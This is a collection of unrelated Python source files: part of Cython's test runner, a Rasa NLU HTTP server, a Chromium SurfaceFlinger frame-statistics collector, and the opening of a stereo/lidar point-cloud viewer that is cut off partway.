help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
# requires glob with the wildcard.
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.shard_count > 1 and options.shard_num == -1:
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
errors = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread():
for shard_num, shard_stats, return_code in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
errors.append(shard_num)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if errors:
sys.stderr.write("Errors for shards %s\n" % ", ".join([str(e) for e in errors]))
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread():
_, stats, return_code = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
from datetime import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.now
write = sys.__stderr__.write
stop = False
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2.6 ...
thread.start()
try:
yield
finally:
stop = True
thread.join()
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Main import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Main import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CFLAGS.append("-DCYTHON_REFNANNY=1")
if xml_output_dir and options.fork:
# doesn't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
# which depends on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'travis_macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
try:
import pycodestyle
except ImportError:
# Hack to make the exclusion visible.
missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
else:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
if sys.version_info < (2, 7):
sys.stderr.write("--failfast not supported with Python < 2.7\n")
else:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
if options.exit_ok:
return options.shard_num, stats, 0
else:
return options.shard_num, stats, not result.wasSuccessful()
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
|
server.py | import argparse
import json
import os
import urlparse
import multiprocessing
import glob
import warnings
import logging
import signal
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from rasa_nlu.train import do_train
from rasa_nlu.config import RasaNLUConfig
class RasaNLUServer(object):
def __init__(self, config):
self.server = None
self.config = config
self.logfile = config.write
self.emulator = self.__create_emulator()
self.interpreter = self.__create_interpreter()
self.data_router = DataRouter(config, self.interpreter, self.emulator)
if 'DYNO' in os.environ and config.backend == 'mitie': # running on Heroku
from rasa_nlu.featurizers.mitie_featurizer import MITIEFeaturizer
MITIEFeaturizer(config.mitie_file)
def __create_interpreter(self):
model_dir = self.config.server_model_dir
metadata, backend = None, None
if model_dir is not None:
# download model from S3 if needed
if not os.path.isdir(model_dir):
try:
from rasa_nlu.persistor import Persistor
p = Persistor(self.config.path, self.config.aws_region, self.config.bucket_name)
p.fetch_and_extract('{0}.tar.gz'.format(os.path.basename(model_dir)))
except:
warnings.warn("using default interpreter, couldn't find model dir or fetch it from S3")
metadata = json.loads(open(os.path.join(model_dir, 'metadata.json'), 'rb').read())
backend = metadata["backend"]
elif self.config.backend:
logging.warn("backend '%s' specified in config, but no model directory is configured. " +
"Using 'hello-goodby' backend instead!", self.config.backend)
if backend is None:
from interpreters.simple_interpreter import HelloGoodbyeInterpreter
logging.info("using default hello-goodby backend")
return HelloGoodbyeInterpreter()
elif backend.lower() == 'mitie':
logging.info("using mitie backend")
from interpreters.mitie_interpreter import MITIEInterpreter
return MITIEInterpreter(**metadata)
elif backend.lower() == 'spacy_sklearn':
logging.info("using spacy + sklearn backend")
from interpreters.spacy_sklearn_interpreter import SpacySklearnInterpreter
return SpacySklearnInterpreter(**metadata)
else:
raise ValueError("unknown backend : {0}".format(backend))
def __create_emulator(self):
mode = self.config.emulate
if mode is None:
from emulators import NoEmulator
return NoEmulator()
elif mode.lower() == 'wit':
from emulators.wit import WitEmulator
return WitEmulator()
elif mode.lower() == 'luis':
from emulators.luis import LUISEmulator
return LUISEmulator()
elif mode.lower() == 'api':
from emulators.api import ApiEmulator
return ApiEmulator()
else:
raise ValueError("unknown mode : {0}".format(mode))
def start(self):
self.server = HTTPServer(('', self.config.port), lambda *args: RasaRequestHandler(self.data_router, *args))
logging.info('Started http server on port %s' % self.config.port)
self.server.serve_forever()
def stop(self):
logging.info('^C received. Aborting.')
if len(self.data_router.responses) > 0:
logging.info('saving logs')
self.data_router.write_logs()
if self.server is not None:
logging.info('shutting down server')
self.server.socket.close()
class DataRouter(object):
def __init__(self, config, interpreter, emulator):
self.config = config
self.interpreter = interpreter
self.emulator = emulator
self.logfile = config.write
self.responses = set()
self.train_proc = None
self.model_dir = config.path
self.token = config.token
def extract(self, data):
return self.emulator.normalise_request_json(data)
def parse(self, text):
result = self.interpreter.parse(text)
self.responses.add(json.dumps(result, sort_keys=True))
return result
def format(self, data):
return self.emulator.normalise_response_json(data)
def write_logs(self):
with open(self.logfile, 'w') as f:
responses = [json.loads(r) for r in self.responses]
f.write(json.dumps(responses, indent=2))
def get_status(self):
if self.train_proc is not None:
training = self.train_proc.is_alive()
else:
training = False
models = glob.glob(os.path.join(self.model_dir, 'model*'))
return json.dumps({
"training": training,
"available_models": models
})
def auth(self, path):
if self.token is None:
return True
else:
parsed_path = urlparse.urlparse(path)
data = urlparse.parse_qs(parsed_path.query)
valid = ("token" in data and data["token"][0] == self.token)
return valid
def start_train_proc(self, data):
logging.info("starting train")
if self.train_proc is not None and self.train_proc.is_alive():
self.train_proc.terminate()
logging.info("training process {0} killed".format(self.train_proc))
fname = 'tmp_training_data.json'
with open(fname, 'w') as f:
f.write(data)
_config = dict(self.config.items())
_config["data"] = fname
train_config = RasaNLUConfig(cmdline_args=_config)
self.train_proc = multiprocessing.Process(target=do_train, args=(train_config,))
self.train_proc.start()
logging.info("training process {0} started".format(self.train_proc))
class RasaRequestHandler(BaseHTTPRequestHandler):
def __init__(self, data_router, *args):
self.data_router = data_router
BaseHTTPRequestHandler.__init__(self, *args)
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
def auth_err(self):
self.send_response(401)
self.wfile.write("unauthorized")
def get_response(self, data_dict):
if u'q' not in data_dict:
return json.dumps({"error": "Invalid parse parameter specified"})
data = self.data_router.extract(data_dict)
result = self.data_router.parse(data["text"])
response = self.data_router.format(result)
return json.dumps(response)
def do_GET(self):
if self.data_router.auth(self.path):
self._set_headers()
if self.path.startswith("/parse"):
parsed_path = urlparse.urlparse(urlparse.unquote(self.path).decode('utf-8'))
data = urlparse.parse_qs(parsed_path.query)
self.wfile.write(self.get_response(data))
elif self.path.startswith("/status"):
response = self.data_router.get_status()
self.wfile.write(response)
else:
self.wfile.write("hello")
else:
self.auth_err()
return
def do_POST(self):
if self.data_router.auth(self.path):
if self.path.startswith("/parse"):
self._set_headers()
data_string = self.rfile.read(int(self.headers['Content-Length']))
data_dict = json.loads(data_string.decode("utf-8"))
self.wfile.write(self.get_response(data_dict))
if self.path.startswith("/train"):
self._set_headers()
data_string = self.rfile.read(int(self.headers['Content-Length']))
self.data_router.start_train_proc(data_string)
self.data_router.start_train_proc(data_string.decode("utf-8"))
self.wfile.write(
json.dumps({"info": "training started with pid {0}".format(self.data_router.train_proc.pid)})
)
else:
self.auth_err()
return
def create_argparser():
parser = argparse.ArgumentParser(description='parse incoming text')
parser.add_argument('-c', '--config',
help="config file, all the command line options can also be passed via a (json-formatted) " +
"config file. NB command line args take precedence")
parser.add_argument('-d', '--server_model_dir',
help='directory containing model to for parser to use')
parser.add_argument('-e', '--emulate', choices=['wit', 'luis', 'api'],
help='which service to emulate (default: None i.e. use simple built in format)')
parser.add_argument('-l', '--language', choices=['de', 'en'], help="model and data language")
parser.add_argument('-m', '--mitie_file',
help='file with mitie total_word_feature_extractor')
parser.add_argument('-p', '--path', help="path where model files will be saved")
parser.add_argument('-P', '--port', type=int, help='port on which to run server')
parser.add_argument('-t', '--token',
help="auth token. If set, reject requests which don't provide this token as a query parameter")
parser.add_argument('-w', '--write', help='file where logs will be saved')
return parser
if __name__ == "__main__":
parser = create_argparser()
cmdline_args = {key: val for key, val in vars(parser.parse_args()).items() if val is not None}
config = RasaNLUConfig(cmdline_args.get("config"), os.environ, cmdline_args)
print(config.view())
logging.basicConfig(filename=config.log_file, level=config.log_level)
logging.captureWarnings(True)
logging.debug(config.view())
try:
def stop(signal_number, frame):
raise KeyboardInterrupt()
signal.signal(signal.SIGTERM, stop)
server = RasaNLUServer(config)
server.start()
except KeyboardInterrupt:
server.stop()
|
surface_stats_collector.py | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import Queue
import datetime
import logging
import re
import threading
from pylib import android_commands
from pylib.device import device_utils
# Log marker containing SurfaceTexture timestamps.
_SURFACE_TEXTURE_TIMESTAMPS_MESSAGE = 'SurfaceTexture update timestamps'
_SURFACE_TEXTURE_TIMESTAMP_RE = r'\d+'
_MIN_NORMALIZED_FRAME_LENGTH = 0.5
class SurfaceStatsCollector(object):
"""Collects surface stats for a SurfaceView from the output of SurfaceFlinger.
Args:
device: A DeviceUtils instance.
"""
class Result(object):
def __init__(self, name, value, unit):
self.name = name
self.value = value
self.unit = unit
def __init__(self, device):
# TODO(jbudorick) Remove once telemetry gets switched over.
if isinstance(device, android_commands.AndroidCommands):
device = device_utils.DeviceUtils(device)
self._device = device
self._collector_thread = None
self._use_legacy_method = False
self._surface_before = None
self._get_data_event = None
self._data_queue = None
self._stop_event = None
self._results = []
self._warn_about_empty_data = True
def DisableWarningAboutEmptyData(self):
self._warn_about_empty_data = False
def Start(self):
assert not self._collector_thread
if self._ClearSurfaceFlingerLatencyData():
self._get_data_event = threading.Event()
self._stop_event = threading.Event()
self._data_queue = Queue.Queue()
self._collector_thread = threading.Thread(target=self._CollectorThread)
self._collector_thread.start()
else:
self._use_legacy_method = True
self._surface_before = self._GetSurfaceStatsLegacy()
def Stop(self):
self._StorePerfResults()
if self._collector_thread:
self._stop_event.set()
self._collector_thread.join()
self._collector_thread = None
def SampleResults(self):
self._StorePerfResults()
results = self.GetResults()
self._results = []
return results
def GetResults(self):
return self._results or self._GetEmptyResults()
@staticmethod
def _GetEmptyResults():
return [
SurfaceStatsCollector.Result('refresh_period', None, 'seconds'),
SurfaceStatsCollector.Result('jank_count', None, 'janks'),
SurfaceStatsCollector.Result('max_frame_delay', None, 'vsyncs'),
SurfaceStatsCollector.Result('frame_lengths', None, 'vsyncs'),
SurfaceStatsCollector.Result('avg_surface_fps', None, 'fps')
]
@staticmethod
def _GetNormalizedDeltas(data, refresh_period, min_normalized_delta=None):
deltas = [t2 - t1 for t1, t2 in zip(data, data[1:])]
if min_normalized_delta != None:
deltas = [d for d in deltas
if d / refresh_period >= min_normalized_delta]
return (deltas, [delta / refresh_period for delta in deltas])
@staticmethod
def _CalculateResults(refresh_period, timestamps, result_suffix):
"""Returns a list of SurfaceStatsCollector.Result."""
frame_count = len(timestamps)
seconds = timestamps[-1] - timestamps[0]
frame_lengths, normalized_frame_lengths = \
SurfaceStatsCollector._GetNormalizedDeltas(
timestamps, refresh_period, _MIN_NORMALIZED_FRAME_LENGTH)
if len(frame_lengths) < frame_count - 1:
logging.warning('Skipping frame lengths that are too short.')
frame_count = len(frame_lengths) + 1
if len(frame_lengths) == 0:
raise Exception('No valid frames lengths found.')
_, normalized_changes = \
SurfaceStatsCollector._GetNormalizedDeltas(
frame_lengths, refresh_period)
jankiness = [max(0, round(change)) for change in normalized_changes]
pause_threshold = 20
jank_count = sum(1 for change in jankiness
if change > 0 and change < pause_threshold)
return [
SurfaceStatsCollector.Result(
'avg_surface_fps' + result_suffix,
int(round((frame_count - 1) / seconds)), 'fps'),
SurfaceStatsCollector.Result(
'jank_count' + result_suffix, jank_count, 'janks'),
SurfaceStatsCollector.Result(
'max_frame_delay' + result_suffix,
round(max(normalized_frame_lengths)),
'vsyncs'),
SurfaceStatsCollector.Result(
'frame_lengths' + result_suffix, normalized_frame_lengths,
'vsyncs'),
]
@staticmethod
def _CalculateBuckets(refresh_period, timestamps):
results = []
for pct in [0.99, 0.5]:
sliced = timestamps[min(int(-pct * len(timestamps)), -3) : ]
results += SurfaceStatsCollector._CalculateResults(
refresh_period, sliced, '_' + str(int(pct * 100)))
return results
def _StorePerfResults(self):
if self._use_legacy_method:
surface_after = self._GetSurfaceStatsLegacy()
td = surface_after['timestamp'] - self._surface_before['timestamp']
seconds = td.seconds + td.microseconds / 1e6
frame_count = (surface_after['page_flip_count'] -
self._surface_before['page_flip_count'])
self._results.append(SurfaceStatsCollector.Result(
'avg_surface_fps', int(round(frame_count / seconds)), 'fps'))
return
# Non-legacy method.
assert self._collector_thread
(refresh_period, timestamps) = self._GetDataFromThread()
if not refresh_period or not len(timestamps) >= 3:
if self._warn_about_empty_data:
logging.warning('Surface stat data is empty')
return
self._results.append(SurfaceStatsCollector.Result(
'refresh_period', refresh_period, 'seconds'))
self._results += self._CalculateResults(refresh_period, timestamps, '')
self._results += self._CalculateBuckets(refresh_period, timestamps)
def _CollectorThread(self):
last_timestamp = 0
timestamps = []
retries = 0
while not self._stop_event.is_set():
self._get_data_event.wait(1)
try:
refresh_period, new_timestamps = self._GetSurfaceFlingerFrameData()
if refresh_period is None or timestamps is None:
retries += 1
if retries < 3:
continue
if last_timestamp:
# Some data has already been collected, but either the app
# was closed or there's no new data. Signal the main thread and
# wait.
self._data_queue.put((None, None))
self._stop_event.wait()
break
raise Exception('Unable to get surface flinger latency data')
timestamps += [timestamp for timestamp in new_timestamps
if timestamp > last_timestamp]
if len(timestamps):
last_timestamp = timestamps[-1]
if self._get_data_event.is_set():
self._get_data_event.clear()
self._data_queue.put((refresh_period, timestamps))
timestamps = []
except Exception as e:
# On any error, before aborting, put the exception into _data_queue to
# prevent the main thread from waiting at _data_queue.get() infinitely.
self._data_queue.put(e)
raise
def _GetDataFromThread(self):
self._get_data_event.set()
ret = self._data_queue.get()
if isinstance(ret, Exception):
raise ret
return ret
def _ClearSurfaceFlingerLatencyData(self):
"""Clears the SurfaceFlinger latency data.
Returns:
True if SurfaceFlinger latency is supported by the device, otherwise
False.
"""
# The command returns nothing if it is supported, otherwise returns many
# lines of result just like 'dumpsys SurfaceFlinger'.
results = self._device.RunShellCommand(
'dumpsys SurfaceFlinger --latency-clear SurfaceView')
return not len(results)
def _GetSurfaceFlingerFrameData(self):
"""Returns collected SurfaceFlinger frame timing data.
Returns:
A tuple containing:
- The display's nominal refresh period in seconds.
- A list of timestamps signifying frame presentation times in seconds.
The return value may be (None, None) if there was no data collected (for
example, if the app was closed before the collector thread has finished).
"""
# adb shell dumpsys SurfaceFlinger --latency <window name>
# prints some information about the last 128 frames displayed in
# that window.
# The data returned looks like this:
# 16954612
# 7657467895508 7657482691352 7657493499756
# 7657484466553 7657499645964 7657511077881
# 7657500793457 7657516600576 7657527404785
# (...)
#
# The first line is the refresh period (here 16.95 ms), it is followed
# by 128 lines w/ 3 timestamps in nanosecond each:
# A) when the app started to draw
# B) the vsync immediately preceding SF submitting the frame to the h/w
# C) timestamp immediately after SF submitted that frame to the h/w
#
# The difference between the 1st and 3rd timestamp is the frame-latency.
# An interesting data is when the frame latency crosses a refresh period
# boundary, this can be calculated this way:
#
# ceil((C - A) / refresh-period)
#
# (each time the number above changes, we have a "jank").
# If this happens a lot during an animation, the animation appears
# janky, even if it runs at 60 fps in average.
#
# We use the special "SurfaceView" window name because the statistics for
# the activity's main window are not updated when the main web content is
# composited into a SurfaceView.
results = self._device.RunShellCommand(
'dumpsys SurfaceFlinger --latency SurfaceView')
if not len(results):
return (None, None)
timestamps = []
nanoseconds_per_second = 1e9
refresh_period = long(results[0]) / nanoseconds_per_second
# If a fence associated with a frame is still pending when we query the
# latency data, SurfaceFlinger gives the frame a timestamp of INT64_MAX.
# Since we only care about completed frames, we will ignore any timestamps
# with this value.
pending_fence_timestamp = (1 << 63) - 1
for line in results[1:]:
fields = line.split()
if len(fields) != 3:
continue
timestamp = long(fields[1])
if timestamp == pending_fence_timestamp:
continue
timestamp /= nanoseconds_per_second
timestamps.append(timestamp)
return (refresh_period, timestamps)
def _GetSurfaceStatsLegacy(self):
"""Legacy method (before JellyBean), returns the current Surface index
and timestamp.
Calculate FPS by measuring the difference of Surface index returned by
SurfaceFlinger in a period of time.
Returns:
Dict of {page_flip_count (or 0 if there was an error), timestamp}.
"""
results = self._device.RunShellCommand('service call SurfaceFlinger 1013')
assert len(results) == 1
match = re.search(r'^Result: Parcel\((\w+)', results[0])
cur_surface = 0
if match:
try:
cur_surface = int(match.group(1), 16)
except Exception:
logging.error('Failed to parse current surface from ' + match.group(1))
else:
logging.warning('Failed to call SurfaceFlinger surface ' + results[0])
return {
'page_flip_count': cur_surface,
'timestamp': datetime.datetime.now(),
}
|
testStereoPointCloud.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import cv2
import numpy as np
import os
import Queue
import sys
import threading
from LidarTransforms import *
from VideoReader import VideoReader
from VtkRenderer import *
from GPSReader import *
from GPSTransforms import *
from ArgParser import *
from StereoCompute import *
global count
global lastTime
class LDRGrabberCallback:
def __init__(self, queue_manager):
self.queue = queue_manager.queue
self.manager = queue_manager
bg_thread = threading.Thread(target=queue_manager.loadNext)
bg_thread.daemon = True
bg_thread.start()
def execute(self, iren, event):
try:
frame_cloud = self.queue.get()
lidar_pts = frame_cloud['lidar_pts']
img = frame_cloud['img']
stereo_pts = frame_cloud['stereo_pts']
global count
count += 1
self.lidarPointCloud = VtkPointCloud(lidar_pts[:, 0:3], lidar_pts[:, 3])
self.stereoPointCloud = VtkPointCloud(stereo_pts[:,0:3], 10+ 0*stereo_pts[:,0])
self.vtkImage = VtkImage(img)
if count > 2:
cloud_r.RemoveActor(self.lidar_actor)
cloud_r.RemoveActor(self.stereo_actor)
image_r.RemoveActor(self.image_actor)
self.lidar_actor = self.lidarPointCloud.get_vtk_cloud(zMin=0, zMax=255)
self.stereo_actor = self.stereoPointCloud.get_vtk_cloud(zMin=-10, zMax=10)
self.image_actor = self.vtkImage.get_vtk_image()
cloud_r.AddActor(self.lidar_actor)
cloud_r.AddActor(self.stereo_actor)
image_r.AddActor(self.image_actor)
# Initially set the camera frame
if count == 2:
cloud_r.ResetCamera()
image_r.ResetCamera()
image_r.GetActiveCamera().Zoom(1.25)
iren.GetRenderWindow().Render()
#cv2.imshow('display', img)
#cv2.waitKey(1)
global lastTime
#print time.time() - lastTime
lastTime = time.time()
except Queue.Empty:
if self.manager.finished == True:
return
class FrameCloudManager:
def __init__(self, args):
self.args = args
self.params = args['params']
self.reader_left = VideoReader(args['video'])
self.reader_right = VideoReader(args['opposite_video'])
self.ldr_map = loadLDRCamMap(args['map'])
self.queue = Queue.Queue()
self.finished = False
def loadNext(self):
while self.finished == False:
for t in range(5):
(success, imgL) = self.reader_left.getNextFrame()
(success, imgR) = self.reader_right.getNextFrame()
if success == False:
self.finished = True
return
#(disp, Q, R1, R2) = doStereo(imgL, imgR, self.params)
#cv2.imshow('disp', disp)
#print Q
#stereo_points = get3dPoints(disp,Q)
#stereo_points = stereo_points[disp > 5, :]
(R1, R2, P1, P2, Q, size1, size2, map1x, map1y, map2x, map2y) = computeStereoRectify(self.params)
stereo_points = np.load(sys.argv[3] + '/3d_' + str(self.reader_left.framenum) + '.npz')['data']
print stereo_points
stereo_points = stereo_points.transpose()
stereo_points = np.dot(R1.transpose(), stereo_points)
print np.amax(stereo_points, axis=1)
print np.amin(stereo_points, axis=1)
stereo_points = np.vstack((stereo_points,
np.ones((1,stereo_points.shape[1]))))
print stereo_points.shape
stereo_points = dot(np.linalg.inv(self.params['cam'][0]['E']), stereo_points)
stereo_wrt_lidar = np.dot(R_to_c_from_l(self.params['cam'][0]).transpose(), stereo_points[0:3,:])
stereo_wrt_lidar = stereo_wrt_lidar.transpose()
stereo_wrt_lidar = stereo_wrt_lidar[:,0:3] - self.params['cam'][0]['displacement_from_l_to_c_in_lidar_frame']
#img = cv2.resize(img, (640, 480))
imgL = cv2.pyrDown(imgL)
